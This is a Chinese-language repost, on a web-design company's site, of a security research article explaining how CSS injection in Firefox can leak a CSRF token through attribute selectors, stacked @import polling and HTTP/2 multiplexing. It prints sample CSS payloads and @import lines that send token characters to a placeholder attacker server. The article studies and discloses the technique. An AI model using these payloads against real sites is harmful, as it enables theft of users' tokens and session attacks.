在Firefox浏览器中如何利用CSS窃取数据-创新互联

这篇文章主要介绍了在Firefox浏览器中如何利用CSS窃取数据，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让小编带着大家一起了解一下。

目前成都创新互联公司已为1000+的企业提供了网站建设、域名、网络空间、网站运营、企业网站设计、朝阳网站维护等服务，公司将坚持客户导向、应用为本的策略，正道将秉承"和谐、参与、激情"的文化，与客户和合作伙伴齐心协力一起成长，共同发展。

0x00 前言

几个月之前，我在Firefox中找到了一个漏洞（ CVE-2019-17016 ）。在研究过程中，我发现了在Firefox浏览器中利用CSS的一种数据窃取技术，可以通过单个注入点窃取数据，这里我想与大家一起分享相关研究成果。

0x01 背景知识

为了演示方便，这里假设我们想窃取元素中的CSRF令牌。

我们无法使用脚本（可能是因为CSP），因此想寻找基于样式的注入方法。传统方法是使用属性选择器，如下所示：

input[name='csrftoken'][value^='a'] {
  background: url(//ATTACKER-SERVER/leak/a);
}
input[name='csrftoken'][value^='b'] {
  background: url(//ATTACKER-SERVER/leak/b);
}
...
input[name='csrftoken'][value^='z'] {
  background: url(//ATTACKER-SERVER/leak/z);
}

如果应用了CSS规则，那么攻击者就能收到HTTP请求，从而获取到令牌的第1个字符。随后，攻击者需要准备另一个样式表，其中包含已窃取的第1个字符，如下所示：

input[name='csrftoken'][value^='aa'] {
  background: url(//ATTACKER-SERVER/leak/aa);
}
input[name='csrftoken'][value^='ab'] {
  background: url(//ATTACKER-SERVER/leak/ab);
}
...
input[name='csrftoken'][value^='az'] {
  background: url(//ATTACKER-SERVER/leak/az);
}

通常情况下，攻击者需要重新加载</code> 中已加载的页面，以便提供后续样式表。</p><p>在2018年， Pepe Vila 提出了一个非常不错的想法，可以在Chrome浏览器中滥用 CSS递归import 方式，通过单个注入点完成相同任务。在2019年，Nathanial Lattimer（ @d0nutptr ）重新提出了相同技巧，但稍微做了点改动。下面我稍微总结一下Lattimer的方法，这种方法与本文的思想比较接近（但我在此次研究过程中并不了解Lattimer之前的成果，因此可能有人会认为我在重复造轮子）。</p><p>简而言之，第一次注入用到了一堆<code>import</code> ：</p><pre>@import url(//ATTACKER-SERVER/polling?len=0); @import url(//ATTACKER-SERVER/polling?len=1); @import url(//ATTACKER-SERVER/polling?len=2); ...</pre><p>核心思想如下：</p><p>1、在一开始，只有第1个<code>@import</code> 会返回样式表，其他语句处于连接阻塞状态。</p><p>2、第1个<code>@import</code> 返回样式表，泄露令牌的第1个字符。</p><p>3、当泄露的第1个令牌到达<code>ATTACKER-SERVER</code> ，第2个<code>import</code> 停止阻塞，返回包含第1个字符的样式表，尝试泄露第2个字符。</p><p>4、当第2个泄露字符到达<code>ATTACKER-SERVER</code> 时，第3个<code>import</code> 停止阻塞……以此类推。</p><p>这种技术之所以行之有效，是因为Chrome会采用异步方式处理<code>import</code> ，因此当任何<code>import</code> 停止阻塞时，Chrome会立即解析该语句并应用规则。</p><p>0x02 Firefox及样式表处理</p><p>前面提到的方法并不适用于Firefox，与Chrome浏览器相比，Firefox对样式表的处理方式大不相同。这里我以几个案例来说明其中差异。</p><p>首先，Firefox会采用同步方式处理样式表。因此，当样式表中有多个<code>import</code> 时，只有当所有<code>import</code> 都处理完毕时，Firefox才会应用CSS规则。考虑如下案例：</p><pre><style> @import '/polling/0'; @import '/polling/1'; @import '/polling/2'; </style></pre><p>假设第1个<code>@import</code> 返回CSS规则，将页面背景设置为蓝色，后续的<code>import</code> 处于阻塞状态（比如永远不会返回任何内容，会挂起HTTP连接）。在Chrome浏览器中，页面会立即变为蓝色，而在Firefox中并不会有任何反应。</p><p>我们可以将所有<code>import</code> 放在独立的<code><style></code> 元素中，从而解决该问题：</p><pre><style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style></pre><p>在上面代码中，Firefox会分别处理所有样式表，因此页面会立刻变蓝色，其他<code>import</code> 会在后台处理。</p><p>但这里还有另一个问题，假设我们想窃取包含10个字符的令牌：</p><pre><style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> ... <style>@import '/polling/10';</style></pre><p>Firefox会立即将10个<code>import</code> 加入队列。在处理完第1个<code>import</code> 后，Firefox会将带有已知字符的另一个请求加入队列。这里的问题在于，该请求会被加到队列末尾。而在默认情况下，浏览器有个限制条件，到同一个服务器只能有6个并发连接。因此，带有已知字符的请求永远不会到达目标服务器，因为已经有到该服务器的6个阻塞连接，最终出现死锁现象。</p><p>0x03 HTTP/2</p><p>6个连接的限制条件由TCP层决定，因此到单个服务器只能有6个TCP连接同时存在。在这种情况下，我认为HTTP/2可能派上用场。HTTP/2有许多优点，比如我们可以通过单个连接发送多个HTTP请求（也就是所谓的多路传输（ multiplexing ）），从而大大提升性能。</p><p>Firefox对单个HTTP/2连接的并发请求数也有限制，但默认情况下限制数为<code>100</code> （具体设置参考<code>about:config</code> 中的<code>network.http.spdy.default-concurrent</code> ）。如果我们需要更多并发数，可以使用不同的主机名，强制Firefox创建第2个TCP连接。比如，如果我们创建到<code>https://localhost:3000</code> 的<code>100</code> 个请求，也创建到<code>https://127.0.0.1:3000</code> 的<code>50</code> 个请求，此时Firefox就会创建2个TCP连接。</p><p>0x04 利用方式</p><p>现在一切准备就绪，我们的主要利用场景如下：</p><p>1、利用代码基于HTTP/2。</p><p>2、通过<code>/polling/:session/:index</code> 端点可以返回CSS，泄露第<code>:index</code> 字符。该请求会处于阻塞状态，直到前一个请求成功泄露第<code>index-1</code> 个字符。<code>:session</code> 路径参数用来区分多次攻击行为。</p><p>3、通过<code>/leak/:session/:value</code> 端点来泄露整个令牌。这里<code>:value</code> 为获取到的完整值，而不单单是最后一个字符。</p><p>4、为了强制Firefox向同一个服务器发起2个TCP连接，这里用到了两个端点，分别为<code>https://localhost:3000</code> 及<code>https://127.0.0.1:3000</code> 。</p><p>5、端点<code>/generate</code> 用来生成示例代码。</p><p>我创建了一个测试平台，目标是通过这种方式窃取<code>csrftoken</code> ，大家可通过此处直接访问该平台。</p><p><img src="/upload/otherpic23/5321.png" alt="在Firefox浏览器中如何利用CSS窃取数据"></p><p>此外，我还在GitHub上托管了 PoC代码，攻击过程可参考此处视频。</p><p>有趣的是，由于我们使用的是HTTP/2，因此攻击过程非常快速，不到3秒就能获取到整个令牌。</p><p>0x05 总结</p><p>在本文中，我演示了如何利用1个注入点，在不想重载页面的情况下，通过CSS窃取数据。这里主要涉及2个要点：</p><p>1、将<code>@import</code> 规则拆分成多个样式表，后续<code>import</code> 不会阻塞浏览器对整个样式表的处理。</p><p>2、为了绕过TCP并发连接数限制，我们需要通过HTTP/2发起攻击。</p><p>感谢你能够认真阅读完这篇文章，希望小编分享的“在Firefox浏览器中如何利用CSS窃取数据”这篇文章对大家有帮助，同时也希望大家多多支持创新互联<a href="https://www.cdcxhl.com/" target="_blank">网站建设公司</a>，，关注创新互联行业资讯频道，更多相关知识等着你来学习!</p> <br> 文章名称：在Firefox浏览器中如何利用CSS窃取数据-创新互联 <br> 路径分享：<a href="http://cdkjz.cn/article/ddcgpe.html">http://cdkjz.cn/article/ddcgpe.html</a> </div> <div class="g-return-wrapper clearfix"> <a href="http://www.cdkjz.cn/" class="home">返回首页</a> <a href="http://www.cdkjz.cn/news/" class="column">了解更多建站资讯</a> </div> </div> </div> <div class="full-related-news"> <h3 class="related-title">相关资讯</h3> <div class="related-news weblg"> <ul class="clearfix"> <li> <a href="/article/dieiesj.html"> <h2 class="title">关于html5年龄的信息</h2> </a> </li><li> <a href="/article/dieiehd.html"> <h2 class="title">linux命令行读取文件 linux 读取文件</h2> </a> </li><li> <a href="/article/dieiehs.html"> <h2 class="title">jqueryjs插件 jquery插件</h2> </a> </li><li> <a href="/article/dieiehp.html"> <h2 class="title">html5英语 html5语法详解</h2> </a> </li><li> <a href="/article/dieiesp.html"> <h2 class="title">mysql怎么做分页查询 mysql分页怎么写</h2> </a> </li><li> <a href="/article/dieisds.html"> <h2 class="title">linuxwegt命令的简单介绍</h2> </a> </li><li> <a href="/article/dieiepo.html"> <h2 class="title">jquery开发指南答案 jquery前端开发实战教程章节答案</h2> </a> </li><li> <a href="/article/dieieho.html"> <h2 class="title">mysql社区办怎么安装社区版mysql安装</h2> </a> </li> </ul> </div> </div> <div class="full-icontact-cover m-ft-contact"> <div class="weblg"> <div class="clearfix content"> <div class="motto"> 多年建站经验 </div> <div class="info"> <h3>多一份参考，总有益处</h3> <h2> 联系快上网，免费获得专属《策划方案》及报价</h2> <div class="msg"> <p>咨询相关问题或预约面谈，可以通过以下方式与我们联系</p> <h4>业务热线：<a href="tel:400-028-6601" rel="nofollow">400-028-6601</a> / 大客户专线   成都：<a href="tel:+13518219792" rel="nofollow">13518219792</a>   座机：<a href="tel:02886922220" rel="nofollow">028-86922220</a> </h4> </div> </div> </div> <div class="btns clearfix"> <a href="https://wpa.qq.com/msgrd?v=3&uin=631063699&site=qq&menu=yes" target="_blank" rel="nofollow" class="oline">在线咨询</a> <a href="javascript:;" class="edit" rel="nofollow">提交需求</a> </div> </div> </div> <div class="footer-content"> <div class="weblg clearfix"> <div class="friend-links"> <h6 class="clearfix"> <span class="tilte">友情链接</span> <a class="exchagne" href="http://wpa.qq.com/msgrd?v=3&uin=631063699&site=qq&menu=yes">交换友情链接</a> </h6> <div class="link-list clearfix"> <div class="link-slider"> <a href="http://www.cdxwcx.cn/weihu/" title="成都网站维护" target="_blank">成都网站维护</a><a href="http://www.cdkjz.cn/fangan/jianshe/" title="网站建设报价方案" target="_blank">网站建设报价方案</a><a href="http://www.cdxwcx.cn/tuoguan/xiyun.html" title="成都西云机房" target="_blank">成都西云机房</a><a href="https://www.cdcxhl.com/weihu/safeguard/" title="网站维护报价" target="_blank">网站维护报价</a><a href="http://www.huifushe.com/" title="石膏隔墙" target="_blank">石膏隔墙</a><a href="http://www.4006tel.net/mobile/" title="app制作" target="_blank">app制作</a><a href="https://www.cdcxhl.com/idc/xixin.html" title="西信服务器托管" target="_blank">西信服务器托管</a><a href="http://www.cdxwcx.cn/tuoguan/xiyun.html" title="成都移动服务器托管" target="_blank">成都移动服务器托管</a><a href="http://m.xwcx.net/dianshang/" title="成都电商解决方案" target="_blank">成都电商解决方案</a><a href="http://www.cxhljz.cn/" title="成都网站设计公司" target="_blank">成都网站设计公司</a> </div> </div> </div> </div> <div class="full-foot-bottom"> <div class="weblg clearfix"> <p>成都网站建设公司地址：成都市青羊区太升南路288号锦天国际A座10层建设咨询<a href="tel:400-028-6601">400-028-6601</a></p> <p> 成都快上网科技有限公司-四川网站建设设计公司 | <a href="http://www.miitbeian.gov.cn/" target="_blank" rel="nofollow">蜀ICP备19037934号</a> Copyright 2020,ALL Rights Reserved cdkjz.cn | <a href="http://www.cdkjz.cn/" target="_blank">成都网站建设</a> | © Copyright 2020版权所有.</p> <p>专家团队为您提供<a href="http://www.cdkjz.cn/" target="_blank">成都网站建设</a>,<a href="http://www.cdkjz.cn/" target="_blank">成都网站设计</a>,成都品牌网站设计,成都营销型网站制作等服务,成都建网站就找快上网！ | 成都网站建设哪家好？ | <a href="###">网站建设地图</a></p> </div> </div> </div> <script type="text/javascript" src="../js/idangerous.swiper.min.js"></script> <script type="text/javascript" src="../js/wow.min.js"></script> <script type="text/javascript" src="../js/jquery.mousewheel.min.js"></script> <script type="text/javascript" src="../js/jquery.placeholder.min.js"></script> <script type="text/javascript" src="../js/layout.js"></script> </body> </html> <script> $(".singlepage img").each(function(){ var src = $(this).attr("src"); //获取图片地址 var str=new RegExp("http"); var result=str.test(src); if(result==false){ var url = "https://www.cdcxhl.com"+src; //绝对路径 $(this).attr("src",url); } }); window.onload=function(){ document.oncontextmenu=function(){ return false; } } </script>

网站建设

网站推广

案例

方案

电商网站开发

微信小程序

我们

联系

精准传达 • 有效沟通

查看其它板块

在Firefox浏览器中如何利用CSS窃取数据-创新互联

网络推广

Network promotion

网站方案

Solution

电商网站开发

E-commerce & System

我们

About Us

联系

Contact Us

精准传达 • 有效沟通

查看其它板块

在Firefox浏览器中如何利用CSS窃取数据-创新互联